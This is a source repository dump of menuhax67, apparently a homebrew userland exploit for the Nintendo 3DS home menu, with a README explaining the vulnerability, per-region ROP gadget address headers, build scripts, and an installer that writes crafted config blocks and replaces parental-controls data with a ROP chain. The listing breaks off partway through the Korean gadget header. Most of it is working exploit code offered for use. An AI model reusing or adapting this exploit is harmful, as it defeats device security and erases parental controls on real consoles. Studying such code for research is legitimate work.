├── LICENSE
├── Makefile
├── README.md
├── build.bat
├── menuhax67_installer
    ├── Makefile
    ├── data
    │   └── null
    ├── icon.png
    └── source
    │   └── main.c
├── rop_gadgets_eur.h
├── rop_gadgets_jpn.h
├── rop_gadgets_kor.h
├── rop_gadgets_usa.h
├── rop_gadgets_usa30.h
└── rop_payload.s


/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2020 zoogie
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
 1 | ifeq ($(strip $(REGION)),)
 2 | $(error "Set the REGION Makefile parameter.")
 3 | endif
 4 | 
 5 | HAXNAME := rop_payload
 6 | BASE_ADDR := 0
 7 | 
 8 | ifeq ($(REGION),USA)
 9 | 	BASE_ADDR := 0x00346a10 
10 | endif
11 | ifeq ($(REGION),USA30)
12 | 	BASE_ADDR := 0x00347a10
13 | endif
14 | ifeq ($(REGION),EUR)
15 | 	BASE_ADDR := 0x00347a10
16 | endif
17 | ifeq ($(REGION),JPN)
18 | 	BASE_ADDR := 0x00347a10
19 | endif
20 | ifeq ($(REGION),KOR)
21 | 	BASE_ADDR := 0x00346a10
22 | endif
23 | 
24 | all:	rop_payload.bin
25 | 
26 | clean:
27 | 	rm -f $(HAXNAME).elf rop_payload.bin rop_gadgets.h
28 | 
29 | rop_payload.bin: $(HAXNAME).elf
30 | 	arm-none-eabi-objcopy -O binary $(HAXNAME).elf rop_payload.bin
31 | 
32 | $(HAXNAME).elf:	$(HAXNAME).s
33 | 	arm-none-eabi-gcc -x assembler-with-cpp -nostartfiles -nostdlib -Ttext=$(BASE_ADDR) $< -o $(HAXNAME).elf
34 | 
35 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # menuhax67
 2 | 
 3 | ## Thanks 
 4 | - @Myriachan for help parsing 3dbrew.org correctly regarding SAFE MODE launching restrictions
 5 | 
 6 | ## Intro
 7 | 
 8 | This is a secondary userland exploit for 3DS home menu. It can be triggered from cold boot but needs user interaction by tapping the home icon on the top left of the bottom screen.<br><br>
 9 | 
10 | Note: This is developer proof-of-concept at the moment due to the initial intended purpose -- launching SAFE_MODE sysupdater without functioning shoulder button(s) -- likely being impossible, even with the SAFE_MODE boolean not set. This exploit could still be useful later on if an arm11 kernel sploit shows up, as it could help something like that attack arm9 in SAFE_MODE.
11 | 
12 | ## What's needed
13 | 
14 | A 3ds (old or new) on firmwares:<br>
15 | ```
16 | 11.7.0-X  -> 11.15.0-X for USA, JAPAN
17 | 11.10.0-X -> 11.15.0-X for EUROPE
18 | 11.5.0-X  -> 11.15.0-X for KOREA
19 | ```
20 | And a userland entrypoint with cfg:s or cfg:i to launch the 3dsx installer.
21 | 
22 | ## Directions 
23 | 
24 | Check the release archive. Stay away if you're not a developer.
25 | 
26 | ## Exploit details
27 | 
28 | Config block 0x50001, which contains a u8 brightness setting that indexes a table of u32 addresses, can be set to an out-of-bounds index (its normally 1-5). Located within cfg block 0x50009, there exists a single controllable u32 that's located within the u8's range. With these set properly, one can eventually redirect a function pointer to an address of their choice.
29 | 
30 | ## Troubleshooting
31 | 
32 | - Problem: I want to uninstall the exploit but I can't get back to the homebrew app to uninstall it for whatever reason.<br>
33 | Solution: Launch a DS title of some sort. DS internet settings or DS download play are okay. Then press the home button and then hold START and press down until the screen brightness noticably changes. This should restore your brightness to a normal value and unlink the exploit. It's still strongly recommended you uninstall with the 3dsx app at some point though.
34 | 
35 | ## FAQ
36 | Q: Why exist, if there's no immediate benefit to precious users?<br>
37 | A: Memes, of course. This is menuhax 11.4+, after all :-p
38 | 
39 | Q: menuhax67? Why name it that?<br>
40 | A: Memes, of course. I'll leave it as an exercise for the reader to decipher what the specific meaning is ;)
41 | 
42 | Q: Why you kill parental setting? Why you hate parent?<br>
43 | A: There aren't a lot of config blocks that are large enough to fit an sd loading rop chain (and also get loaded by home menu), and parental controls was just big enough for that purpose. And parental controls suck, no offense to parents out there.
44 | 
45 | Q: Why did you choose Launcher.dat for the sd payload name? That erases my Gateway launcher.
46 | A: Probably for the same reason Gateway did, to save enough space to fit a ropchain where I want.
47 | RIP your Gateway launcher but GW3DS is really dead already. Get some proper cfw for Lenny's sake.


--------------------------------------------------------------------------------
/build.bat:
--------------------------------------------------------------------------------
 1 | make clean REGION="USA"
 2 | cp rop_gadgets_usa.h rop_gadgets.h 
 3 | make REGION="USA"
 4 | cp rop_payload.bin menuhax67_installer/data/rop_usa.bin
 5 | 
 6 | make clean REGION="USA30"
 7 | cp rop_gadgets_usa30.h rop_gadgets.h 
 8 | make REGION="USA30"
 9 | cp rop_payload.bin menuhax67_installer/data/rop_usa30.bin
10 | 
11 | make clean REGION="EUR"
12 | cp rop_gadgets_eur.h rop_gadgets.h 
13 | make REGION="EUR"
14 | cp rop_payload.bin menuhax67_installer/data/rop_eur.bin
15 | 
16 | make clean REGION="JPN"
17 | cp rop_gadgets_jpn.h rop_gadgets.h 
18 | make REGION="JPN"
19 | cp rop_payload.bin menuhax67_installer/data/rop_jpn.bin
20 | 
21 | make clean REGION="KOR"
22 | cp rop_gadgets_kor.h rop_gadgets.h 
23 | make REGION="KOR"
24 | cp rop_payload.bin menuhax67_installer/data/rop_kor.bin
25 | 
26 | cd menuhax67_installer && make clean && make
27 | cp menuhax67_installer.3dsx f:/3ds
28 | pause


--------------------------------------------------------------------------------
/menuhax67_installer/Makefile:
--------------------------------------------------------------------------------
  1 | #---------------------------------------------------------------------------------
  2 | .SUFFIXES:
  3 | #---------------------------------------------------------------------------------
  4 | 
  5 | ifeq ($(strip $(DEVKITARM)),)
  6 | $(error "Please set DEVKITARM in your environment. export DEVKITARM=<path to>devkitARM")
  7 | endif
  8 | 
  9 | TOPDIR ?= $(CURDIR)
 10 | include $(DEVKITARM)/3ds_rules
 11 | 
 12 | #---------------------------------------------------------------------------------
 13 | # TARGET is the name of the output
 14 | # BUILD is the directory where object files & intermediate files will be placed
 15 | # SOURCES is a list of directories containing source code
 16 | # DATA is a list of directories containing data files
 17 | # INCLUDES is a list of directories containing header files
 18 | # GRAPHICS is a list of directories containing graphics files
 19 | # GFXBUILD is the directory where converted graphics files will be placed
 20 | #   If set to $(BUILD), it will statically link in the converted
 21 | #   files as if they were data files.
 22 | #
 23 | # NO_SMDH: if set to anything, no SMDH file is generated.
 24 | # ROMFS is the directory which contains the RomFS, relative to the Makefile (Optional)
 25 | # APP_TITLE is the name of the app stored in the SMDH file (Optional)
 26 | # APP_DESCRIPTION is the description of the app stored in the SMDH file (Optional)
 27 | # APP_AUTHOR is the author of the app stored in the SMDH file (Optional)
 28 | # ICON is the filename of the icon (.png), relative to the project folder.
 29 | #   If not set, it attempts to use one of the following (in this order):
 30 | #     - <Project name>.png
 31 | #     - icon.png
 32 | #     - <libctru folder>/default_icon.png
 33 | #---------------------------------------------------------------------------------
 34 | TARGET		:=	$(notdir $(CURDIR))
 35 | BUILD		:=	build
 36 | SOURCES		:=	source
 37 | DATA		:=	data
 38 | INCLUDES	:=	include
 39 | GRAPHICS	:=	gfx
 40 | GFXBUILD	:=	$(BUILD)
 41 | #ROMFS		:=	romfs
 42 | #GFXBUILD	:=	$(ROMFS)/gfx
 43 | 
 44 | APP_TITLE		:= menuhax67_installer
 45 | APP_DESCRIPTION		:= v1.2
 46 | APP_AUTHOR		:= zoogie
 47 | 
 48 | #---------------------------------------------------------------------------------
 49 | # options for code generation
 50 | #---------------------------------------------------------------------------------
 51 | ARCH	:=	-march=armv6k -mtune=mpcore -mfloat-abi=hard -mtp=soft
 52 | 
 53 | CFLAGS	:=	-g -Wall -O2 -mword-relocations \
 54 | 			-ffunction-sections \
 55 | 			$(ARCH)
 56 | 
 57 | CFLAGS	+=	$(INCLUDE) -DARM11 -D__3DS__
 58 | 
 59 | CXXFLAGS	:= $(CFLAGS) -fno-rtti -fno-exceptions -std=gnu++11
 60 | 
 61 | ASFLAGS	:=	-g $(ARCH)
 62 | LDFLAGS	=	-specs=3dsx.specs -g $(ARCH) -Wl,-Map,$(notdir $*.map)
 63 | 
 64 | LIBS	:= -lctru -lm
 65 | 
 66 | #---------------------------------------------------------------------------------
 67 | # list of directories containing libraries, this must be the top level containing
 68 | # include and lib
 69 | #---------------------------------------------------------------------------------
 70 | LIBDIRS	:= $(CTRULIB)
 71 | 
 72 | 
 73 | #---------------------------------------------------------------------------------
 74 | # no real need to edit anything past this point unless you need to add additional
 75 | # rules for different file extensions
 76 | #---------------------------------------------------------------------------------
 77 | ifneq ($(BUILD),$(notdir $(CURDIR)))
 78 | #---------------------------------------------------------------------------------
 79 | 
 80 | export OUTPUT	:=	$(CURDIR)/$(TARGET)
 81 | export TOPDIR	:=	$(CURDIR)
 82 | 
 83 | export VPATH	:=	$(foreach dir,$(SOURCES),$(CURDIR)/$(dir)) \
 84 | 			$(foreach dir,$(GRAPHICS),$(CURDIR)/$(dir)) \
 85 | 			$(foreach dir,$(DATA),$(CURDIR)/$(dir))
 86 | 
 87 | export DEPSDIR	:=	$(CURDIR)/$(BUILD)
 88 | 
 89 | CFILES		:=	$(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.c)))
 90 | CPPFILES	:=	$(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.cpp)))
 91 | SFILES		:=	$(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.s)))
 92 | PICAFILES	:=	$(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.v.pica)))
 93 | SHLISTFILES	:=	$(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.shlist)))
 94 | GFXFILES	:=	$(foreach dir,$(GRAPHICS),$(notdir $(wildcard $(dir)/*.t3s)))
 95 | BINFILES	:=	$(foreach dir,$(DATA),$(notdir $(wildcard $(dir)/*.*)))
 96 | 
 97 | #---------------------------------------------------------------------------------
 98 | # use CXX for linking C++ projects, CC for standard C
 99 | #---------------------------------------------------------------------------------
100 | ifeq ($(strip $(CPPFILES)),)
101 | #---------------------------------------------------------------------------------
102 | 	export LD	:=	$(CC)
103 | #---------------------------------------------------------------------------------
104 | else
105 | #---------------------------------------------------------------------------------
106 | 	export LD	:=	$(CXX)
107 | #---------------------------------------------------------------------------------
108 | endif
109 | #---------------------------------------------------------------------------------
110 | 
111 | #---------------------------------------------------------------------------------
112 | ifeq ($(GFXBUILD),$(BUILD))
113 | #---------------------------------------------------------------------------------
114 | export T3XFILES :=  $(GFXFILES:.t3s=.t3x)
115 | #---------------------------------------------------------------------------------
116 | else
117 | #---------------------------------------------------------------------------------
118 | export ROMFS_T3XFILES	:=	$(patsubst %.t3s, $(GFXBUILD)/%.t3x, $(GFXFILES))
119 | export T3XHFILES		:=	$(patsubst %.t3s, $(BUILD)/%.h, $(GFXFILES))
120 | #---------------------------------------------------------------------------------
121 | endif
122 | #---------------------------------------------------------------------------------
123 | 
124 | export OFILES_SOURCES 	:=	$(CPPFILES:.cpp=.o) $(CFILES:.c=.o) $(SFILES:.s=.o)
125 | 
126 | export OFILES_BIN	:=	$(addsuffix .o,$(BINFILES)) \
127 | 			$(PICAFILES:.v.pica=.shbin.o) $(SHLISTFILES:.shlist=.shbin.o) \
128 | 			$(addsuffix .o,$(T3XFILES))
129 | 
130 | export OFILES := $(OFILES_BIN) $(OFILES_SOURCES)
131 | 
132 | export HFILES	:=	$(PICAFILES:.v.pica=_shbin.h) $(SHLISTFILES:.shlist=_shbin.h) \
133 | 			$(addsuffix .h,$(subst .,_,$(BINFILES))) \
134 | 			$(GFXFILES:.t3s=.h)
135 | 
136 | export INCLUDE	:=	$(foreach dir,$(INCLUDES),-I$(CURDIR)/$(dir)) \
137 | 			$(foreach dir,$(LIBDIRS),-I$(dir)/include) \
138 | 			-I$(CURDIR)/$(BUILD)
139 | 
140 | export LIBPATHS	:=	$(foreach dir,$(LIBDIRS),-L$(dir)/lib)
141 | 
142 | export _3DSXDEPS	:=	$(if $(NO_SMDH),,$(OUTPUT).smdh)
143 | 
144 | ifeq ($(strip $(ICON)),)
145 | 	icons := $(wildcard *.png)
146 | 	ifneq (,$(findstring $(TARGET).png,$(icons)))
147 | 		export APP_ICON := $(TOPDIR)/$(TARGET).png
148 | 	else
149 | 		ifneq (,$(findstring icon.png,$(icons)))
150 | 			export APP_ICON := $(TOPDIR)/icon.png
151 | 		endif
152 | 	endif
153 | else
154 | 	export APP_ICON := $(TOPDIR)/$(ICON)
155 | endif
156 | 
157 | ifeq ($(strip $(NO_SMDH)),)
158 | 	export _3DSXFLAGS += --smdh=$(CURDIR)/$(TARGET).smdh
159 | endif
160 | 
161 | ifneq ($(ROMFS),)
162 | 	export _3DSXFLAGS += --romfs=$(CURDIR)/$(ROMFS)
163 | endif
164 | 
165 | .PHONY: all clean
166 | 
167 | #---------------------------------------------------------------------------------
168 | all: $(BUILD) $(GFXBUILD) $(DEPSDIR) $(ROMFS_T3XFILES) $(T3XHFILES)
169 | 	@$(MAKE) --no-print-directory -C $(BUILD) -f $(CURDIR)/Makefile
170 | 
171 | $(BUILD):
172 | 	@mkdir -p $@
173 | 
174 | ifneq ($(GFXBUILD),$(BUILD))
175 | $(GFXBUILD):
176 | 	@mkdir -p $@
177 | endif
178 | 
179 | ifneq ($(DEPSDIR),$(BUILD))
180 | $(DEPSDIR):
181 | 	@mkdir -p $@
182 | endif
183 | 
184 | #---------------------------------------------------------------------------------
185 | clean:
186 | 	@echo clean ...
187 | 	@rm -fr $(BUILD) $(TARGET).3dsx $(OUTPUT).smdh $(TARGET).elf $(GFXBUILD)
188 | 
189 | #---------------------------------------------------------------------------------
190 | $(GFXBUILD)/%.t3x	$(BUILD)/%.h	:	%.t3s
191 | #---------------------------------------------------------------------------------
192 | 	@echo $(notdir $<)
193 | 	@tex3ds -i $< -H $(BUILD)/$*.h -d $(DEPSDIR)/$*.d -o $(GFXBUILD)/$*.t3x
194 | 
195 | #---------------------------------------------------------------------------------
196 | else
197 | 
198 | #---------------------------------------------------------------------------------
199 | # main targets
200 | #---------------------------------------------------------------------------------
201 | $(OUTPUT).3dsx	:	$(OUTPUT).elf $(_3DSXDEPS)
202 | 
203 | $(OFILES_SOURCES) : $(HFILES)
204 | 
205 | $(OUTPUT).elf	:	$(OFILES)
206 | 
207 | #---------------------------------------------------------------------------------
208 | # you need a rule like this for each extension you use as binary data
209 | #---------------------------------------------------------------------------------
210 | %.bin.o	%_bin.h :	%.bin
211 | #---------------------------------------------------------------------------------
212 | 	@echo $(notdir $<)
213 | 	@$(bin2o)
214 | 
215 | #---------------------------------------------------------------------------------
216 | .PRECIOUS	:	%.t3x
217 | #---------------------------------------------------------------------------------
218 | %.t3x.o	%_t3x.h :	%.t3x
219 | #---------------------------------------------------------------------------------
220 | 	@echo $(notdir $<)
221 | 	@$(bin2o)
222 | 
223 | #---------------------------------------------------------------------------------
224 | # rules for assembling GPU shaders
225 | #---------------------------------------------------------------------------------
226 | define shader-as
227 | 	$(eval CURBIN := $*.shbin)
228 | 	$(eval DEPSFILE := $(DEPSDIR)/$*.shbin.d)
229 | 	echo "$(CURBIN).o: $< $1" > $(DEPSFILE)
230 | 	echo "extern const u8" `(echo $(CURBIN) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`"_end[];" > `(echo $(CURBIN) | tr . _)`.h
231 | 	echo "extern const u8" `(echo $(CURBIN) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`"[];" >> `(echo $(CURBIN) | tr . _)`.h
232 | 	echo "extern const u32" `(echo $(CURBIN) | sed -e 's/^\([0-9]\)/_\1/' | tr . _)`_size";" >> `(echo $(CURBIN) | tr . _)`.h
233 | 	picasso -o $(CURBIN) $1
234 | 	bin2s $(CURBIN) | $(AS) -o $*.shbin.o
235 | endef
236 | 
237 | %.shbin.o %_shbin.h : %.v.pica %.g.pica
238 | 	@echo $(notdir $^)
239 | 	@$(call shader-as,$^)
240 | 
241 | %.shbin.o %_shbin.h : %.v.pica
242 | 	@echo $(notdir $<)
243 | 	@$(call shader-as,$<)
244 | 
245 | %.shbin.o %_shbin.h : %.shlist
246 | 	@echo $(notdir $<)
247 | 	@$(call shader-as,$(foreach file,$(shell cat $<),$(dir $<)$(file)))
248 | 
249 | #---------------------------------------------------------------------------------
250 | %.t3x	%.h	:	%.t3s
251 | #---------------------------------------------------------------------------------
252 | 	@echo $(notdir $<)
253 | 	@tex3ds -i $< -H $*.h -d $*.d -o $*.t3x
254 | 
255 | -include $(DEPSDIR)/*.d
256 | 
257 | #---------------------------------------------------------------------------------------
258 | endif
259 | #---------------------------------------------------------------------------------------
260 | 


--------------------------------------------------------------------------------
/menuhax67_installer/data/null:
--------------------------------------------------------------------------------
1 | just something to ensure a data folder appears in git


--------------------------------------------------------------------------------
/menuhax67_installer/icon.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zoogie/menuhax67/e21b4e273bd790bffe67efff3e4897ec9703a843/menuhax67_installer/icon.png


--------------------------------------------------------------------------------
/menuhax67_installer/source/main.c:
--------------------------------------------------------------------------------
  1 | #include <stdio.h>
  2 | #include <stdlib.h>
  3 | #include <string.h>
  4 | #include <3ds.h>
  5 | 
  6 | #include "rop_usa_bin.h"
  7 | #include "rop_usa30_bin.h"
  8 | #include "rop_eur_bin.h"
  9 | #include "rop_jpn_bin.h"
 10 | #include "rop_kor_bin.h"
 11 | 
 12 | u8 *data; 
 13 | int iscfw=0;
 14 | char path[0x200]={0};
 15 | 
 16 | const char *yellow="\x1b[33;1m";
 17 | const char *blue="\x1b[34;1m";
 18 | const char *dblue="\x1b[34;0m";
 19 | const char *white="\x1b[37;1m";
 20 | 
 21 | Result menuhax67(){
 22 | 	if(iscfw){
 23 | 		printf("YOU ALREADY HAVE CFW!\n");
 24 | 		//return 0;
 25 | 	}
 26 | 	Result res=0;
 27 | 	u32 base_addr=0;  //0x3093d0
 28 | 	u8 region=0xff;
 29 | 	bool isnew=*(u32*)0x1FF80030 == 6;
 30 | 	FS_ProductInfo info;
 31 | 	u64 menus[7]={  //index will correspond to region value
 32 | 		0x0004003000008202LL, //JPN
 33 | 		0x0004003000008F02LL, //USA
 34 | 		0x0004003000009802LL, //EUR
 35 | 		0x0004003000009802LL, //AUS same as EUR
 36 | 		0,                    //CHN
 37 | 		0x000400300000A902LL, //KOR
 38 | 		0                     //TWN
 39 | 		};
 40 | 	u32 rop[0xC0/4]={0};
 41 | 	u32 fail=1;
 42 | 	u32 procid=0;
 43 | 	u16 menuversion=0;
 44 | 	
 45 | 	res += CFGU_SecureInfoGetRegion(&region);
 46 | 	res += NS_LaunchTitle(menus[region], 0, &procid);
 47 | 	res += FSUSER_GetProductInfo(&info, procid);
 48 | 	menuversion=info.remasterVersion;
 49 | 	
 50 | 	if(res){
 51 | 		printf("Error: issue with version check\n");
 52 | 		return 4;
 53 | 	}
 54 | 	
 55 | 	if(region==0){
 56 | 		base_addr=0x00347a10;
 57 | 		memcpy(rop, rop_jpn_bin, rop_jpn_bin_size); 
 58 | 		printf("JPN\n");
 59 | 		if(menuversion != 31){
 60 | 			printf("Error: unsupported menu r%d, expected r31\n", menuversion);
 61 | 			return 3;
 62 | 		}
 63 | 	}
 64 | 	else if(region==1){
 65 | 		printf("USA r%d\n", menuversion);
 66 | 		if(menuversion == 29){
 67 | 			base_addr=0x00346a10;
 68 | 			memcpy(rop, rop_usa_bin, rop_usa_bin_size); 
 69 | 		}
 70 | 		else if(menuversion == 30){
 71 | 			base_addr=0x00347a10;
 72 | 			memcpy(rop, rop_usa30_bin, rop_usa30_bin_size); 
 73 | 		}
 74 | 		else{
 75 | 			printf("Error: unsupported menu r%d, expected r29/30\n", menuversion);
 76 | 			return 3;
 77 | 		}
 78 | 	}
 79 | 	else if(region==2 || region==3){
 80 | 		base_addr=0x00347a10;
 81 | 		memcpy(rop, rop_eur_bin, rop_eur_bin_size); 
 82 | 		printf("EUR\n");
 83 | 		if(menuversion != 29){
 84 | 			printf("Error: unsupported menu r%d, expected r29\n", menuversion);
 85 | 			return 3;
 86 | 		}
 87 | 	}
 88 | 	else if(region==5){
 89 | 		base_addr=0x00346a10;
 90 | 		memcpy(rop, rop_kor_bin, rop_kor_bin_size); 
 91 | 		printf("KOR\n");
 92 | 		if(menuversion != 15){
 93 | 			printf("Error: unsupported menu r%d, expected r15\n", menuversion);
 94 | 			return 3;
 95 | 		}
 96 | 	}
 97 | 	else{
 98 | 		printf("Error: region not supported\n");    
 99 | 		return 1;
100 | 	}
101 | 	
102 | 	base_addr+=0xA8;
103 | 	
104 | 	if(isnew){
105 | 		printf("NEW3DS\n");
106 | 		for(int i=0;i<0xC0/4;i++){
107 | 			if(rop[i]==0x35040000){ //find the old3ds linearmem address and patch it to new3ds address
108 | 				rop[i]=0x38C40000;
109 | 				fail=0;
110 | 			}
111 | 		}
112 | 		if(fail==1){
113 | 			printf("Error: new3ds address location not found\n");
114 | 			return 2;
115 | 		}
116 | 	}
117 | 	else{
118 | 		printf("OLD3DS\n");
119 | 		fail=0;
120 | 	}
121 | 	
122 | 	res = CFG_GetConfigInfoBlk4(2, 0x50001, data);
123 | 	data[1]=0xE;
124 | 	res = CFG_SetConfigInfoBlk4(2, 0x50001, data);
125 | 	
126 | 	res = CFG_GetConfigInfoBlk4(8, 0x50009, data);
127 | 	*(u32*)(data+4)=base_addr;
128 | 	res = CFG_SetConfigInfoBlk4(8, 0x50009, data);
129 | 	
130 | 	res = CFG_SetConfigInfoBlk4(0xc0, 0xc0000, rop);//36857a10 08557a10
131 | 	
132 | 	res = CFG_UpdateConfigSavegame();  //note that this is the cfg:i version of this function, so it won't work with anything but mset
133 | 	printf("done %08X\n", (int)res);   //easy workaround is to patch header 00 00 03 08 --> 00 00 03 04 in the binary (first occurrence 2f50)
134 | 	                                   //not really in the mood to make a local libctru or bother the libctru maintainers
135 | 	return 0;
136 | }
137 | 
138 | Result uninstall(){
139 | 	Result res;
140 | 	Result res2;
141 | 
142 | 	res = CFG_GetConfigInfoBlk4(2, 0x50001, data);
143 | 	data[1]=0x3;            //reverts brightness level to 3 (range 1-5)
144 | 	res = CFG_SetConfigInfoBlk4(2, 0x50001, data);
145 | 	
146 | 	res = CFG_GetConfigInfoBlk4(8, 0x50009, data);
147 | 	*(u32*)(data+4)=0x00000101;  //don't know what this is, but 0x101 is the value that's usually there
148 | 	res = CFG_SetConfigInfoBlk4(8, 0x50009, data);
149 | 
150 | 	memset(data, 0, 0xC0);  //reverts parental controls to a blank state
151 | 	data[0x9]=0x14;
152 | 	
153 | 	res = CFG_SetConfigInfoBlk4(0xc0, 0xc0000, data);
154 | 	
155 | 	res = CFG_UpdateConfigSavegame();
156 | 	
157 | 	if(iscfw){
158 | 		strcat(path, "/Nintendo DSiWare/F00D43D5.bin");
159 | 		res2 = remove(path);
160 | 		if(!res2) printf("F00D43D5.bin removed\n");
161 | 	}
162 | 	
163 | 	printf("done %08X\n", (int)res);
164 | 	
165 | 	return 0;
166 | }
167 | 
168 | int cursor=0;
169 | int menu(u32 n){
170 | 	consoleClear();
171 | 	
172 | 	printf("menuhax67 installer v1.2 - zoogie\nSTATUS: %s\n\n", iscfw ? "cfw":"user");
173 | 	printf("CAUTION: This will crank your brightness up to\nfull and erase parental controls\n\n");
174 | 
175 | 	char *choices[]={
176 | 		"INSTALL menuhax67",
177 | 		"REMOVE  menuhax67",
178 | 		"EXIT    to menu",
179 | 	};
180 | 	
181 | 	int maxchoices=sizeof(choices)/4; //each array element is a 32 bit pointer so numElements is sizeof/4 (this is a bad practice but whatever).
182 | 	
183 | 	if(n & KEY_UP) cursor--;
184 | 	else if (n & KEY_DOWN) cursor++;
185 | 	if (cursor >= maxchoices) cursor=0;
186 | 	else if (cursor < 0) cursor=maxchoices-1;
187 | 	
188 | 	
189 | 	for(int i=0; i<maxchoices; i++){
190 | 		printf("%s%s%s\n", cursor==i ? yellow:white, choices[i], white);
191 | 	}
192 | 	
193 | 	printf("--------------------------------------------------");
194 | 	printf(" \n");
195 | 	
196 | 	if(n & KEY_A) {
197 | 		
198 | 		switch(cursor){
199 | 			case 0:
200 | 			menuhax67();
201 | 			break;
202 | 			
203 | 			case 1:
204 | 			uninstall(); 
205 | 			break;
206 | 			
207 | 			case 2:
208 | 			return 1;
209 | 			break;
210 | 			
211 | 			default:;
212 | 		};
213 | 		svcSleepThread(500*1000*1000);
214 | 	}
215 | 	
216 | 	return 0;
217 | }
218 | 
219 | int main(int argc, char* argv[])
220 | {
221 | 	Result res;
222 | 	gfxInitDefault();
223 | 	consoleInit(GFX_TOP, NULL);
224 | 	u8 ctrpath[0x200]={0};
225 | 	memset(ctrpath, 0, 0x200); //make damned sure this is safe
226 | 	memset(path, 0, 0x200); 
227 | 	
228 | 	data=(u8*)malloc(0x10000);
229 | 
230 | 	cfguInit();
231 | 	nsInit();
232 | 	fsInit();
233 | 	
234 | 	res = CFG_GetConfigInfoBlk4(2, 0, data);
235 | 	if(res){
236 | 		printf("Error: cfg:s or cfg:i not available, abort\n");
237 | 		while(1) svcSleepThread(17*1000*1000);
238 | 	}
239 | 	res = FSUSER_ExportIntegrityVerificationSeed((FS_IntegrityVerificationSeed*)(data+0x8000)); //data outputed is don't care, we're just testing for cfw. hax* userland would never be allowed to call this.
240 | 	if(!res){
241 | 		iscfw=1;
242 | 		res = FSUSER_GetSdmcCtrRootPath(ctrpath, 0x80*2);
243 | 		for(int i=0;i<0x180;i++){
244 | 			path[i]=ctrpath[i*2];
245 | 			if(!path[i]) break;
246 | 		}
247 | 	}
248 | 	//printf("%08X\n",(int)res);
249 | 	//printf("%s\n",(char*)path);
250 | 	//printf("\n");
251 | 	
252 | 	menu(0);
253 | 
254 | 	// Main loop
255 | 	while (aptMainLoop())
256 | 	{
257 | 		gspWaitForVBlank();
258 | 		gfxSwapBuffers();
259 | 		hidScanInput();
260 | 
261 | 		u32 kDown = hidKeysDown();
262 | 		
263 | 		if(kDown & 0xfff){
264 | 			//if(fail) break;
265 | 			res = menu(kDown);
266 | 			if(res) break;
267 | 		}
268 | 	}
269 | 
270 | 	gfxExit();
271 | 	return 0;
272 | }


--------------------------------------------------------------------------------
/rop_gadgets_eur.h:
--------------------------------------------------------------------------------
 1 | #define IFile_Open 0x0022c0d8+4
 2 | #define IFile_Read 0x0022bfc4+4
 3 | #define FS_MountSdmc 0x00118bec+4
 4 | #define GSP_ForceLcdBlack 0x0012E120+4
 5 | #define GSPGPU_SERVHANDLEADR 0x00235d90
 6 | 
 7 | #define STACK_PIVOT 0x001002d8 //: ldmib r6!, {r2, r4, r5, ip, sp, lr, pc}
 8 | #define R6_SETUP 0x001829f0 //: ldr r6, [r5, #4] ; cmp r6, #0 ; beq #0x82a38 ; ldr r0, [r5] ; ldr r1, [r0, #4] ; mov r0, r5 ; blx r1
 9 | #define POP_R0127PC 0x00249fb0+1 //: pop {r0, r1, r2, r6, pc}
10 | #define POP_R012347PC 0x001eaffe+1 //: pop {r0, r1, r2, r3, r4, r7, pc}
11 | #define ROP_POPPC 0x0010e5d8
12 | #define POP_R0PC 0x00157920
13 | #define POP_R1PC 0x00237648
14 | 
15 | #define BASE 0x00347a10 
16 | #define MNT 0x00322a76   // YS:
17 | #define PATH 0x0023a982  // YS:/Launcher.dat
18 | #define FILE BASE-0x400


--------------------------------------------------------------------------------
/rop_gadgets_jpn.h:
--------------------------------------------------------------------------------
 1 | #define IFile_Open 0x0022be20+4
 2 | #define IFile_Read 0x0022bd0c+4
 3 | #define FS_MountSdmc 0x00118bec+4
 4 | #define GSP_ForceLcdBlack 0x0012E120+4
 5 | #define GSPGPU_SERVHANDLEADR 0x0033bfd0
 6 | 
 7 | #define STACK_PIVOT 0x001002d8 //: ldmib r6!, {r2, r4, r5, ip, sp, lr, pc}
 8 | #define R6_SETUP 0x00182af0 //: ldr r6, [r5, #4] ; cmp r6, #0 ; beq #0x82a38 ; ldr r0, [r5] ; ldr r1, [r0, #4] ; mov r0, r5 ; blx r1
 9 | #define POP_R0127PC 0x002bf54c+1 //: pop {r0, r1, r2, r6, pc}
10 | #define POP_R012347PC 0x001eae46+1 //: pop {r0, r1, r2, r3, r4, r7, pc}
11 | #define ROP_POPPC 0x0010e5d8
12 | #define POP_R0PC 0x00157920
13 | #define POP_R1PC 0x00237390
14 | 
15 | #define BASE 0x00347a10
16 | #define MNT 0x00322a76   // YS:
17 | #define PATH 0x0023a856  // YS:/Launcher.dat
18 | #define FILE BASE-0x400


--------------------------------------------------------------------------------
/rop_gadgets_kor.h:
--------------------------------------------------------------------------------
 1 | #define IFile_Open 0x0022bc20+4
 2 | #define IFile_Read 0x0022bb0c+4
 3 | #define FS_MountSdmc 0x00118bec+4
